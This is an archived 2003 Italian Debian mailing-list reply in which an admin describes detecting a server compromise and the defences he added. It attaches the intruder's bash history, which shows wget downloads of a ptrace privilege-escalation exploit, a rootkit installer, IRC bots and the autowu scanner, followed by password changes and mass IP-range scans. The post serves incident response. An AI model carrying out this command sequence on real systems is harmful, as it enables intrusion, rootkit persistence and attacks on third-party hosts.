Re: server bucato

To: Mauro <mauro.sanna6@tin.it>
Cc: debian-italian@lists.debian.org
Subject: Re: server bucato
From: paolino <paolino@bastardi.net>
Date: Mon, 10 Nov 2003 10:24:38 +0100
Message-id: <[🔎] 20031110092438.GB4021@server1.adelante>
In-reply-to: <[🔎] 200311092339.16121.mauro.sanna6@tin.it>
References: <[🔎] 20031105195437.GA16723@server1.adelante> <[🔎] 200311092339.16121.mauro.sanna6@tin.it>

On Sun, Nov 09, 2003 at 11:39:16PM +0100, Mauro wrote:
> On Wednesday 05 November 2003 20:54, paolino wrote:
> > ciao, poco tempo fa mi è stato bucato un server...
> > non potendo reinstallarlo, almeno per il momento, volevo trovare un
> > mdo per tappare i vari buchi. 
> 
> Come ti sei accorto della sua compromissione?

Me ne sono accorto perche in giro per il sistema c'erano un tot di file, decisamente particolari.
Uno di quelli più interessanti è il file .bash_history dell'utente guest che vi allego.
Dategli un'occhiata.. a quel punto ho fatto un po di controlli, è ho trovato un sacco di cose..

Binari modificati in /bin /sbin ... non  me ne sono accorto finchè, dopo anomalie di funzionamento degli stessi, non ho fatto un lsattr.
Poi ho fatto andare chkrootkit e mi ha trovato un tot di processi hidden
ecc. ecc.

Adesso penso di aver "ripulito" la macchina almeno dai rootkit che erano stati messi.
ho inserito un tot di controlli in piu (snort; aide e tiger), ho sistemato il logchek, chiuso un paio di servizi e acceso un cero...
Speriamo che per ora basti :)

fatemi sapere

Paolino
> 
> --
> To UNSUBSCRIBE, email to debian-italian-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

-- 
La teoria e' quando si sa tutto ma non funziona niente.
La pratica e' quando funziona tutto ma non si sa il perche'.
In ogni caso si finisce sempre a coniugare la teoria con la
pratica : non funziona niente e non si sa il perche'.
Albert Einstein

cd /pub/
ls
exit
id
./pt
exit
ls
passwd
ls
wget http://packetstorm.linuxsecurity.org/0304-exploits/ptrace-kmod.c
gcc ptrace-kmod.c -o pt
./pt
exit
ls
nslookup
id
whoami
uname -a
ps -fea
cat /etc/passwd
passwd backup
passwd proxy
ls
rm -ef pt
rm -rf ptrace-kmod.c
rm -rf pt 
ls
ls
/pt
ls
pt
./pt
ls
cd .atos
mkdir .atos
cd .atos
wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz
tar -zxvf emech-2.8.4.tar.gz
rm -rf emech-2.8.4.tar.gz
cd emech-2.8.4
./configure
y
make
mv sample.set mech.txt 
cat > mech.set 
./genuser
./mech
ls
./mech
./emech.users
./genuser
./mech
passwd
ls
cd .atos
ls
ls
uname -a
wget http://packetstorm.linuxsecurity.org/0304-exploits/ptrace-kmod.c 
gcc ptrace-kmod.c -o pt
./pt
cat /etc/passwd
passwd mysql
passwd temp
passwd www
passwd www
passwd proxy
passwd www-data
ls
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz 
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz 
nslookup
ls
wget http://www.psychoid.lam3rz.de/psyBNC2.3.1.tar.gz
tar -zxvf psyBNC2.3.1.tar.gz
cd psybnc
make
pico psybnc.conf
ls
ps -fea
wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz
tar -zxvf emech-2.8.4.tar.gz
rm -rf emech-2.8.4.tar.gz
cd emech-2.8.4
./configure 
make
make install
mv sample.set mech.txt 
cat > mech.set 
./genuser
./mech
./mech
./mech
ls
cd emech-2.8.4
./mech
./mech
./mech
kill -9 guest 
kill -9  1782
kill -9 1847
kill -9  1849 
kill -9  1865 
kill -9 
init: Mech(s) added [ shitz ]
kill -9  1867 
kill -9 1956
ls
cd emech-2.8.4 
./genuser
./mech
./mech
ps -fea
ls
ps -fea
passwd -Z
ls
./pt
ls
uname -a
ps -fea
wget http://bahamut.ielf.org/other/bots/emech/2.8.x/emech-2.8.4.tar.gz
tar -zxvf emech-2.8.4.tar.gz
rm -rf emech-2.8.4.tar.gz
cd emech-2.8.4
./configure 
make
make install
mv sample.set mech.txt 
cat > mech.set 
./genuser
./mech
./mech
ps -fea
tar -zxvf autowu.zip
tar -zvf autowu.zip
ls
tar -zxvf autowu.zip
ls
ps -fea
ls
cd emech-2.8.4 
./mech
cd ..
ls
ls
wget http://comunidad.vlex.com/wscrip/mamadas/scannerstgz/autowu.zip
passwd -Z
tar -zxvf autowu.zip
ls
./pt
wget http://mx.geocities.com/straorg/scanner/autowu.tgz
tar -zxvf autowu.tgz
cd autowu
./awu 214.115
cd ..
 cd .kde
cd .kde
ls
mkdir .scan
cd .scan
wget http://mx.geocities.com/straorg/scanner/autowu.tgz
tar -zxvf autowu.tgz
cd .kde
cd autowu
./awu 0.0
./awu 212.12
passwd -Z
ls
./pt
ps -fea
kill -9 5938
ls
tar -zxvf psyBNC2.3.1.tar.gz 
cd psybnc 
make
pico psybnc.conf
cd ..
ls
cd emech-2.8.4
./mech
./mech
ps -fea
ls
cd emech-2.8.4
./mech
ps -fea
passwd -Z
cd ..
ls
./pt
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/asmd.tgz 
tar zxf asmd.tgz 
perl install.pl 
passwd -Z 
ls
wget www.geocities.com/master0n/bestwu.tgz 
tar -zxvf bestwu.tgz 
cd
aw
cd aw
./awu 0.0
./awu 217.13
./awu 217.16
./awu 219.230
./awu 219.213
./awu 219.20
./awu 218.121
./awu 128.17
./awu 12.143
./awu 212.15
./awu 212.112
./awu 212.20
./awu 212.24
./awu 212.29
/wu -a -v -d -f ns.hostuniverse.com
ps -fea
who
kill -9 28752
cd /usr/sbin
who
./userdel Ilic
who
cd ..
ls
cd ..
ls
wget www.geocities.com/master0n/bestwu.tgz 
tar -zxvf bestwu.tgz 
cd aw
./awu 0.0
./awu 137.2
./awu 137.19
./awu 218.12
./awu 218.13
./awu 208.101
./awu 208.41
./awu 208.119
./awu 208.211
passwd -Z
ls
ll
ls -lap
ll
ls
ls -lap
mc
cd /usr/sbin
ls
./useradd pippo
./userdel asdueba

Reply to:

Follow-Ups:
- Re: server bucato
  - From: Daniele <danielec@hotpop.com>
- Re: server bucato
  - From: Cesare D'Amico <cesare@ngi.it>
- Re: server bucato
  - From: Marco Menchise <iz8aeb@amsat.org>
- Re: server bucato
  - From: Mattia Dongili <dongili@supereva.it>

References:
- server bucato
  - From: paolino <paolino@bastardi.net>
- Re: server bucato
  - From: Mauro <mauro.sanna6@tin.it>

Prev by Date: Re: stranezze kde/xterm
Next by Date: Re: ISO xfree 4.3 kde 3.1.4
Previous by thread: Re: server bucato
Next by thread: Re: server bucato
Index(es):
- Date
- Thread